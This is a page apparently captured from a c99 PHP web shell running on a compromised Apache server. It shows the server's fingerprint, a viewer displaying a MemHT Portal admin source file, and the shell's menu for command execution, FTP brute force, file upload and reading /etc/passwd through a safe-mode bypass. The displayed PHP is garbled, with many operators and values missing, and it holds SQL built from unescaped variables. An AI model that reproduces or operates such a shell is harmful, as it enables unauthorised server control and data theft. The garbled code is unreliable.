!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/admin/pages/administrators/   drwxr-xr-x
Free 50.92 GB of 127.8 GB (39.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (13.39 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/********************************************************************************
    - MemHT Portal -
    
    Copyright (C) 2007 by Miltenovik Manojlo
    http://www.memht.com
    
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your opinion) any later version.
    
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.
    
    You should have received a copy of the GNU General Public License along
    with this program; if not, see <http://www.gnu.org/licenses/> (GPLv2)
    or write to the Free Software Foundation, Inc., 51 Franklin Street,
    Fifth Floor, Boston, MA02110-1301, USA.
        
********************************************************************************/

if (!defined("_LOAD_PAGE_")) {
    die("<table style='padding: 2px; border: 1px solid #999; background-color: #EEE; font-family: Verdana; font-size: 10px;' align='center'><tr><td><b>Error:</b> This file cannot be opened directly!</td></tr></table>");
}



$op = (isset($_GET['op'])) ? inCode($_GET['op']) : "" ;
$ok = (isset($_GET['ok'])) ? inCode($_GET['ok']) : false ;
$id = (isset($_GET['id'])) ? intval($_GET['id']) : ;
$rank = (isset($_POST['rank'])) ? intval($_POST['rank']) : ;
$username = (isset($_POST['username'])) ? inCode($_POST['username']) : "" ;


function adminList() {
    global $dblink,$siteConfig,$userid;

    $n 0;
    echo "<table width='100%' align='center' cellspacing='1' cellpadding='0' class='std_nicetable'>";
    echo "<thead>\n";
    echo "<tr><td>"._USERNAME_."</td><td>"._LEVEL_."</td><td width='15%'>"._LASTIP_."</td><td width='20%'>"._LASTLOGIN_."</td><td width='1%'>&nbsp;</td></tr>\n";
    echo "</thead>\n";
    echo "<tbody>\n";
    $result $dblink->get_list("SELECT id,user,rank,lastip,DATE_FORMAT(lastlogin, '".$siteConfig['timestamp']."') as lastlogin FROM memht_utenti WHERE rank>1 ORDER BY rank DESC, user ASC");
    foreach ($result as $row) {
        $id intval($row['id']);
        $user outCode($row['user']);
        $rank intval($row['rank']);
        $lastip outCode($row['lastip']);
        $lastlogin $row['lastlogin'];
        
        $perm = ($rank==2) ? "<a href='admin.php?page=administrators&op=privs&id=$id' title='"._PERMISSION_."'><img src='admin/icons/config.png' border='0' alt='"._PERMISSION_."'></a> " "" ;
        
        switch ($rank) {
            case 2:
                $rank _POWERUSER_;
                $rankcolor "#000";
            break;
            case 3:
                $rank _ADMIN_;
                $rankcolor "#06F";
            break;
            case 4:
                $rank _SUPERADMIN_;
                $rankcolor "#900";
            break;
        }
        
        $class = (($n++%2)!=0) ? "hlight" "clean" ;
        
        if ($id==OR $id==$userid) {
            $operations "<img src='images/key.png' alt='"._LOCKED_."' title='"._LOCKED_."'>";
        } else {
            $operations "{$perm}<a href='admin.php?page=administrators&op=editAdmin&id=$id' title='"._MODIFY_."'><img src='images/edit.gif' alt='"._MODIFY_."' border='0'></a> <a href='admin.php?page=administrators&op=deleteAdmin&id=$id' title='"._DELETE_."'><img src='images/delete.gif' alt='"._DELETE_."' border='0'></a>";
        }
        
        echo "<tr><td class='$class'><a href='index.php?page=users&op=userInfo&uid=$id' title='$user'><span style='color:{$rankcolor};'><b>$user</b></span></a></td><td class='$class'>$rank</td><td class='$class'><a href='admin.php?page=security&op=findip&ok=true&ip=$lastip' title='"._FIND_." $lastip'>$lastip</a></td><td class='$class' nowrap>$lastlogin</td><td class='$class' align='right' nowrap>$operations</td></tr>\n";    
    }
    echo "</tbody>\n";
    echo "</table>";
}    

function add($username,$rank,$ok=false) {
    global $dblink;
    
    if (!$ok) {
        echo "<table width='100%' align='center' cellspacing='0' cellpadding='1'>\n";
        echo "<form name='addadmin' method='post' action='admin.php?page=administrators&op=addAdmin&ok=true'>\n";
        echo "<tr><td width='25%'><b>"._USERNAME_."</b></td><td><input type='text' name='username' size='20' maxlength='255'> <input type='button' value='"._FIND_."' onClick=\"openPopup('inc/popwin/finduser.php?form=addadmin&element=username&username='+document.forms['addadmin'].elements['username'].value+'','350','400');\"></td></tr>\n";
        echo "<tr><td><b>"._LEVEL_."</b></td><td>";
            echo "<select name='rank'>\n";
                echo "<option value='0' selected>"._SELECT_."</option>\n";
                echo "<option value='2'>"._POWERUSER_."</option>\n";
                echo "<option value='3'>"._ADMIN_."</option>\n";
                echo "<option value='4'>"._SUPERADMIN_."</option>\n";
            echo "</select></td></tr>\n";
        echo "<tr><td colspan='2'><input type='submit' name='Submit' value='"._ADD_."'></td></tr>\n";
        echo "</form>\n";
        echo "</table>\n";
    } else {    
        $save true;
        if ($username=="") { $save false$msg _USERNAME_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        if ($rank==0) { $save false$msg _LEVEL_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
        
        if ($save) {
            $row $dblink->get_row("SELECT id FROM memht_utenti WHERE user='$username'");
            $id intval($row['id']);
            
            if (memRunHooks('AddAdmin',array($id))) {
                $dblink->query("UPDATE memht_utenti SET rank='$rank' WHERE id=$id");
                
                memRunHooks('AddAdminEnd',array($id));
            }
            
            $link = ($rank==2) ? "&op=privs&id=$id" "" ;
            echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators{$link}'>";
        } else {
            echo "<div align='center' id='errorText'><b>$msg</b></div>";
        }
    }
}

function edit($id,$rank,$ok=false) {
    global $dblink;
    
    if ($id>1) {
        if (!$ok) {
            $row $dblink->get_row("SELECT user,rank FROM memht_utenti WHERE id=$id");
            $username outCode($row['user']);
            $rank intval($row['rank']);
            
            echo "<table width='100%' align='center' cellspacing='0' cellpadding='1'>\n";
            echo "<form name='addadmin' method='post' action='admin.php?page=administrators&op=editAdmin&id=$id&ok=true'>\n";
            echo "<tr><td width='25%'><b>"._USERNAME_."</b></td><td><input type='text' name='username' value=\"$username\" size='20' maxlength='255' disabled></td></tr>\n";
            echo "<tr><td><b>"._LEVEL_."</b></td><td>";
                echo "<select name='rank'>\n";
                    echo "<option value='0'>"._SELECT_."</option>\n";
                    $selected = ($rank==2) ? " selected" "" ;
                    echo "<option value='2'{$selected}>"._POWERUSER_."</option>\n";
                    $selected = ($rank==3) ? " selected" "" ;
                    echo "<option value='3'{$selected}>"._ADMIN_."</option>\n";
                    $selected = ($rank==4) ? " selected" "" ;
                    echo "<option value='4'{$selected}>"._SUPERADMIN_."</option>\n";
                echo "</select></td></tr>\n";
            echo "<tr><td colspan='2'><input type='submit' name='Submit' value='"._MODIFY_."'></td></tr>\n";
            echo "</form>\n";
            echo "</table>\n";
        } else {    
            $save true;
            if ($rank==0) { $save false$msg _LEVEL_." ".strtolower(_FIELD_)." ".strtolower(_REQUIRED_); }
            
            if ($save) {
                if (memRunHooks('EditAdmin',array($id))) {
                    $dblink->query("UPDATE memht_utenti SET rank='$rank' WHERE id=$id");
                    
                    memRunHooks('EditAdminEnd',array($id));
                }
                
                $link = ($rank==2) ? "&op=privs&id=$id" "" ;
                echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators{$link}'>";
            } else {
                echo "<div align='center' id='errorText'><b>$msg</b></div>";
            }
        }
    } else {
        echo "<div align='center' id='errorText'><b>"._LOCKED_."</b></div>";
    }
}

function delete($id,$ok=false) {
    global $dblink,$userid;
    
    if ($id>1) {
        if ($ok) {
            if (memRunHooks('DeleteAdmin',array($id))) {
                $dblink->query("UPDATE memht_utenti SET rank=1 WHERE id=$id");
                $dblink->query("DELETE FROM memht_privs WHERE userid=$id");
                
                memRunHooks('DeleteAdminEnd',array($id));
            }
        //-pop----------
        $dblink->query("DELETE FROM memht_utenti_accesspages WHERE u_id='$id' and pages='news' ");
        //-pop----------
            echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators'>";        
        } else {
            echo "<div align='center'><b>"._SUREDELETEADMIN_."</b><br><a href='admin.php?page=administrators&op=deleteAdmin&id=$id&ok=true' title='"._YES_."'>"._YES_."</a> - <a href='admin.php?page=administrators' title='"._NO_."'>"._NO_."</a></div>";
        }
    } else {
        echo "<div align='center' id='errorText'><b>"._LOCKED_."</b></div>";
    }
}

function managePrivs($id,$ok=false) {
    global $dblink,$userid;
    
    $row $dblink->get_row("SELECT user,rank FROM memht_utenti WHERE id=$id");
    $username outCode($row['user']);
    $rank intval($row['rank']);
    
    if ($id>AND $rank==2) {    
        unset($filearray);
        $filearray = array();
        $handle opendir('admin/pages/');
        while (false !== ($file readdir($handle))) {
            $filename file_name($file);
            if ($file != "." AND $file != ".." AND !eregi("html",$file)) {
                $filearray[] = $filename;
            }
        }
        closedir($handle);
        @sort($filearray);
        @reset($filearray);
        
        if (!$ok) {
            echo "<form name='mngadm' method='post' action='admin.php?page=administrators&op=privs&id=$id&ok=true'>\n";
            echo "<table width='100%' align='center' cellspacing='1' cellpadding='0' class='std_nicetable'>\n";
            echo "<thead>\n";
                echo "<tr><td colspan='2'><b>$username</b></td></tr>\n";
            echo "</thead>\n";
            echo "<tbody>\n";
                $pagesnow = array();
                $result $dblink->get_list("SELECT page FROM memht_privs WHERE userid=$id");
                foreach ($result as $row) {
                    $pagesnow[] = outCode($row['page']);
                }
    
                $n 0;
                foreach($filearray as $file) {
                    $title ucfirst($file);
                    $file_val = (in_array($file,$pagesnow)) ? ;
                    $bold = ($file_val>0) ? " style='font-weight:bold;'" "" ;
                        
                    $class = (($n++%2)!=0) ? "hlight" "clean" ;
                    if ($file_val) { $slct " checked"; } else { $slct ""; }
                    
                    echo "<tr><td width='50%' class='$class'{$bold}>$title</td><td align='right' class='$class'><input type='checkbox' name='$file' value='1'$slct></td></tr>\n";

                //pop Add catagory of news to assign for user

                    if($title=="News") {
                        echo "<tr><td>&nbsp;</td><td>";
                        $arg_list $dblink->get_list("SELECT * FROM memht_argomenti order by id");
                        foreach ($arg_list as $row) {
                            echo "<input type='checkbox' name='chk[]' value='".$row['id']."' ";
                            $sql "SELECT a_id
                                FROM memht_utenti_accesspages  
                                WHERE u_id=$id and a_id=".$row['id']." and pages='news'";
                            if($dblink->get_num($sql)==1) echo "checked";
                            echo ">".$row['nome']."<br>";
                        }
                    echo "</td></tr>";
                //-pop----------
                    } else if ($title=="Download") {
                    echo "<tr><td>&nbsp;</td><td>";

                        $download_list $dblink->get_list("SELECT * FROM memht_download_categorie order by id");
                        foreach ($download_list as $row) {
                            if ($row['parent'] == 0) {

                                echo "<input type='checkbox' name='chk2[]' value='".$row['id']."' ";
                                $sql "SELECT a_id
                                    FROM memht_utenti_accesspages  
                                    WHERE u_id=$id and a_id=".$row['id']." and pages='download'";
                                if($dblink->get_num($sql)==1) echo "checked";
                                echo ">".$row['nome']."<br>";
                            }
                        }

                    echo "</td></tr>";
                    }






                } //loop for
                
            echo "</tbody>\n";
            echo "</table>\n";
            echo "<input type='submit' name='Submit' value='"._SAVE_."' style='margin-top:2px;'>\n";
            echo "</form>\n";
        } else {
            $dblink->query("DELETE FROM memht_privs WHERE userid=$id");
            
            $queryp = array();
            foreach($filearray as $file) {
                if (isset($_POST[$file])) { $queryp[] = "('$id','$file')"; }
            }
            $query "INSERT INTO memht_privs (userid,page) VALUES ";
            $query .= implode(",",$queryp);
            $dblink->query($query);

        //-pop----------
            $dblink->query("DELETE FROM memht_utenti_accesspages WHERE u_id='$id' and pages='news'");

            //add news catagory
            $chk $_POST['chk'];
                for($i=0$i<count($chk); $i++){
                    $dblink->query("INSERT INTO  memht_utenti_accesspages VALUES($id,".$chk[$i].",'news')");
                }

            $dblink->query("DELETE FROM memht_utenti_accesspages WHERE u_id='$id' and pages='download'");

            //add download catagory
            $chk2 $_POST['chk2'];
                for($i=0$i<count($chk2); $i++){
                    $dblink->query("INSERT INTO  memht_utenti_accesspages VALUES($id,".$chk2[$i].",'download')");
                }


        //-pop----------

            echo "<meta http-equiv='refresh' content='0;URL=admin.php?page=administrators'>";
        }
    } else {
        echo "<div align='center' id='errorText'><b>"._LOCKED_."</b></div>";
    }
}

require_once("admin/inc/inc_header.php");
    admin_page_title($page);
    
    openTable();
        echo "<div align='center' class='box'>";
            echo "<a href='admin.php?page=administrators' title='"._LIST_."'><img src='admin/icons/list.png' border='0' title='"._LIST_."' align='top'> "._LIST_."</a>";
            echo " - <a href='admin.php?page=administrators&op=addAdmin' title='"._ADD_."'><img src='admin/icons/add.png' border='0' title='"._ADD_."' align='top'> "._ADD_."</a>";
        echo "</div>";
    closeTable();
    
    openTable();

        switch($op) {
            case "addAdmin":
                add($username,$rank,$ok);
            break;
            
            case "editAdmin":
                edit($id,$rank,$ok);
            break;
            
            case "deleteAdmin":
                delete($id,$ok);
            break;
            
            case "privs":
                managePrivs($id,$ok);
            break;
        
            default:
                adminList();
            break;
        }
    
    closeTable();
require_once("admin/inc/inc_footer.php");

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0139 ]--